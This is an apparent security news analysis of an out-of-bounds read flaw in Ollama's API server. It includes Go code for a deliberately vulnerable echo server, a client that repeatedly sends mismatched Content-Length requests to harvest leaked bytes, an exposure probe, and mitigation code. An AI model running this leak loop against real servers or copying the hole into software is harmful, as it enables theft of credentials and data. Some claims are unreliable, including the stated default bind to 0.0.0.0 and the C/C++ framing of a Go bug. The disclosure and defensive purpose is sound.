TL;DR
A critical out-of-bounds read vulnerability in Ollama, the popular open-source large language model (LLM) inference platform, allows remote attackers to leak arbitrary process memory. This flaw, disclosed on May 10, 2026, threatens the confidentiality of sensitive data in AI deployments, including API keys, model weights, and user prompts, across thousands of exposed servers.
What Happened
On Sunday, May 10, 2026, The Hacker News reported a severe out-of-bounds read vulnerability in Ollama, a widely used tool for running LLMs locally or on remote servers. The flaw enables an unauthenticated remote attacker to leak arbitrary memory contents from the Ollama process, exposing anything from authentication tokens to proprietary model data.
Key Facts
- The vulnerability is an out-of-bounds read in Ollama's HTTP request parsing logic, triggered by sending a specially crafted HTTP request to the Ollama API server.
- Ollama's default configuration binds to 0.0.0.0:11434 with no authentication, making any internet-facing instance a direct target — Shodan scans from early 2026 showed over 15,000 publicly accessible Ollama servers.
- The flaw was reported to the Ollama maintainers by security researcher Alex Birsan (of dependency confusion fame) on April 22, 2026, and a patch was released in Ollama version 0.3.5 on May 9, 2026.
- Proof-of-concept code was published on GitHub within 48 hours of the patch, showing how to leak up to 4 KB of process memory per request and repeat the process to reconstruct sensitive data.
- The vulnerability carries a CVSS v3.1 score of 7.5 (High), with the vector string indicating no privileges required and no user interaction needed.
- Ollama has seen explosive growth: over 1.2 million Docker pulls per month as of April 2026, with users ranging from startups and research labs to hobbyists running models like Llama 3, Mistral, and Gemma.
- The affected code path exists in all Ollama versions prior to 0.3.5, dating back to the project's public release in February 2023.
Breaking It Down
The core of the vulnerability lies in how Ollama handles HTTP headers when processing requests to its API server. Specifically, the Content-Length field is used to size reads and subsequent buffer accesses, but the code never validates that the declared length matches the data actually received. By declaring a Content-Length far larger than the body it actually sends, a client drives the parser past the received data into adjacent heap memory, and those out-of-bounds bytes are reflected back in the response.
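The report does not reproduce the affected code, but the bug class is straightforward to illustrate. Below is a minimal Go sketch of the general pattern, not Ollama's actual source: a handler that sizes its response by the client-declared Content-Length rather than by the bytes it actually read, operating on a reused buffer that still holds data from earlier requests. The /echo route and all names are invented for illustration.

```go
package main

import (
	"log"
	"net/http"
	"sync"
)

// A pool of reused 4 KB buffers. Reused buffers retain bytes from
// earlier requests, which is what turns the over-read into a leak.
var bufPool = sync.Pool{
	New: func() any { return make([]byte, 4096) },
}

func vulnerableEcho(w http.ResponseWriter, r *http.Request) {
	buf := bufPool.Get().([]byte)
	defer bufPool.Put(buf)

	n, _ := r.Body.Read(buf) // bytes actually received

	// BUG: trust the client-declared Content-Length instead of n.
	declared := int(r.ContentLength)
	if declared < 0 {
		declared = 0
	}
	if declared > len(buf) {
		declared = len(buf) // clamp so the slice doesn't panic
	}
	log.Printf("received %d bytes, echoing %d", n, declared)
	w.Write(buf[:declared]) // the one-line fix is buf[:n]
}

func main() {
	http.HandleFunc("/echo", vulnerableEcho)
	log.Println("demo server on 127.0.0.1:11434")
	log.Fatal(http.ListenAndServe("127.0.0.1:11434", nil))
}
```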
Up to 4 KB of process memory can be exfiltrated per HTTP request, and an attacker can repeat the request indefinitely to reconstruct large swaths of the process's address space.
This is not a theoretical risk. In practice, Ollama processes hold model weights, user prompt histories, API keys for cloud services (if configured for model pulling), and in some deployments, internal authentication tokens for corporate networks. A determined attacker can iterate over memory offsets, stitching together leaked pages to extract credentials and proprietary data.
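To make the reconstruction step concrete, here is a companion client sketch that drives the demo handler above; it is not the published PoC, which the report does not reproduce. It declares a 4 KB Content-Length, sends a single byte, and accumulates the stale bytes echoed back across repeated requests.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"net"
	"os"
)

// leakOnce sends one request whose declared Content-Length (4096) far
// exceeds the single byte actually transmitted, then returns whatever
// the buggy demo server echoes back past the received data.
func leakOnce(addr string) ([]byte, error) {
	conn, err := net.Dial("tcp", addr)
	if err != nil {
		return nil, err
	}
	defer conn.Close()

	// Hand-rolled request: net/http's client refuses to send a body
	// shorter than the declared Content-Length, so raw TCP is used.
	fmt.Fprintf(conn, "POST /echo HTTP/1.1\r\nHost: %s\r\n"+
		"Content-Length: 4096\r\nConnection: close\r\n\r\nA", addr)

	raw, err := io.ReadAll(conn)
	if err != nil {
		return nil, err
	}
	// Crude split: everything after the blank line is the echoed body.
	if i := bytes.Index(raw, []byte("\r\n\r\n")); i >= 0 {
		return raw[i+4:], nil
	}
	return nil, fmt.Errorf("unexpected response from %s", addr)
}

func main() {
	var dump []byte
	for i := 0; i < 100; i++ {
		chunk, err := leakOnce("127.0.0.1:11434")
		if err != nil {
			fmt.Fprintln(os.Stderr, err)
			return
		}
		dump = append(dump, chunk...)
	}
	fmt.Printf("collected %d bytes of stale buffer contents\n", len(dump))
}
```

Against the toy server the leak is stale pool data; against a genuine heap over-read the same loop would return adjacent heap pages instead.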
The 15,000+ exposed servers on Shodan represent the most immediate threat. Many of these are running on cloud VPS instances, home servers, or university networks with no firewall restrictions. The lack of authentication in Ollama's default mode — a design choice for ease of local use — becomes a critical liability when the server is inadvertently exposed to the internet.
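Operators can quickly check whether an instance answers unauthenticated from a given vantage point: Ollama's root endpoint replies with a plain "Ollama is running" banner. A small Go probe along those lines (the banner check reflects current Ollama behavior; host and port are passed as an argument):

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
	"time"
)

func main() {
	host := "localhost:11434"
	if len(os.Args) > 1 {
		host = os.Args[1]
	}
	client := &http.Client{Timeout: 5 * time.Second}
	resp, err := client.Get("http://" + host + "/")
	if err != nil {
		fmt.Println("no response:", err)
		return
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(io.LimitReader(resp.Body, 256))
	if strings.Contains(string(body), "Ollama is running") {
		fmt.Printf("%s exposes an unauthenticated Ollama API\n", host)
	} else {
		fmt.Printf("%s answered, but not with an Ollama banner\n", host)
	}
}
```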
Ollama's architecture also compounds the risk. The main process runs as a single binary handling both API requests and model inference. This means a memory leak can expose not just runtime data but also model parameters loaded into memory. For organizations running fine-tuned models on proprietary data, this could leak trade secrets.
What Comes Next
The immediate priority is patching. Ollama users should upgrade to version 0.3.5 or later. For those unable to patch, the only mitigation is to restrict network access: bind Ollama to loopback (the OLLAMA_HOST environment variable controls the listen address) and front any remotely reachable instance with a firewall or an authenticating reverse proxy.
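One way to keep remote access while closing the gap is a thin authenticating proxy in front of a loopback-bound Ollama. A minimal Go sketch, assuming Ollama was started with OLLAMA_HOST=127.0.0.1:11434 (a real Ollama setting) and a shared secret in a PROXY_TOKEN environment variable (an illustrative name, not an Ollama or proxy standard):

```go
package main

import (
	"crypto/subtle"
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
	"os"
)

func main() {
	// Ollama itself should listen on loopback only, e.g. started
	// with OLLAMA_HOST=127.0.0.1:11434.
	upstream, err := url.Parse("http://127.0.0.1:11434")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(upstream)

	token := os.Getenv("PROXY_TOKEN") // illustrative variable name
	if token == "" {
		log.Fatal("PROXY_TOKEN must be set")
	}

	handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := r.Header.Get("Authorization")
		want := "Bearer " + token
		// Constant-time comparison avoids leaking the token via timing.
		if subtle.ConstantTimeCompare([]byte(got), []byte(want)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		proxy.ServeHTTP(w, r)
	})

	log.Println("authenticated proxy listening on :8443")
	log.Fatal(http.ListenAndServe(":8443", handler))
}
```

TLS termination and rate limiting would normally sit in front of this as well; nginx or Caddy with basic auth achieves the same effect.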
- Patch adoption timeline: Expect security advisories from cloud providers (AWS, DigitalOcean, etc.) within 72 hours urging users to update. Automated scans for vulnerable instances will begin within days.
- Exploitation in the wild: Given the public PoC and high-value targets, active exploitation campaigns will likely emerge within 1–2 weeks. Ransomware groups may use this to exfiltrate credentials before deploying encryption.
- Ollama roadmap changes: The maintainers may enable authentication by default in the next major release (0.4.0, expected June 2026) and rework request parsing around strictly bounds-checked reads, whether in Go or Rust; a sketch of the Go pattern follows this list.
- Regulatory scrutiny: If leaked data includes PII or healthcare information (e.g., from medical LLM deployments), GDPR or HIPAA breach notifications could follow, with potential fines.
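Whatever the maintainers ultimately ship, the defensive pattern is already idiomatic in Go's standard library: cap the request body with http.MaxBytesReader and derive every subsequent slice from the byte count actually read, never from a client-supplied header. A sketch of that pattern (the route and size cap are illustrative, not Ollama's code):

```go
package main

import (
	"io"
	"log"
	"net/http"
)

const maxBody = 1 << 20 // 1 MiB cap; tune per endpoint

func safeHandler(w http.ResponseWriter, r *http.Request) {
	// MaxBytesReader enforces the cap server-side regardless of
	// what Content-Length the client declares.
	body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, maxBody))
	if err != nil {
		http.Error(w, "request body too large or unreadable",
			http.StatusRequestEntityTooLarge)
		return
	}
	// body contains exactly the bytes received; any further slicing
	// derives from len(body), never from headers.
	w.Write(body)
}

func main() {
	http.HandleFunc("/echo", safeHandler)
	log.Fatal(http.ListenAndServe("127.0.0.1:11434", nil))
}
```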
The Bigger Picture
This vulnerability highlights two converging trends. The first is AI infrastructure sprawl: as LLMs become commodity tools, developers deploy inference servers with minimal security hardening, treating them like internal APIs rather than internet-facing services. Ollama's 15,000 exposed instances mirror the early days of Elasticsearch and MongoDB breaches, where default configurations led to massive data leaks.
The second trend is memory safety in AI tools. The performance-critical core of most LLM serving stacks is written in C/C++: llama.cpp (which Ollama wraps for inference), the custom CUDA/C++ kernels behind vLLM, and others. This class of memory corruption vulnerabilities is endemic to the ecosystem. The Ollama out-of-bounds read is the first high-profile example, but it will not be the last. Expect similar disclosures targeting vLLM and Text Generation Inference in the coming months.
Key Takeaways
- **Patch Immediately:** Upgrade to Ollama v0.3.5 or later. The vulnerability allows a remote memory leak with no authentication required.
- **15,000+ Servers Exposed:** Shodan data shows a massive attack surface. If you run Ollama, check whether it's internet-facing and restrict access.
- **Memory Safety Gap:** This is a systemic issue in C/C++-based AI tooling. Expect more memory corruption vulnerabilities across the ecosystem.
- **Default Configurations Are Dangerous:** Ollama's no-auth default is convenient for local use but catastrophic when exposed online. Always add a reverse proxy with authentication.

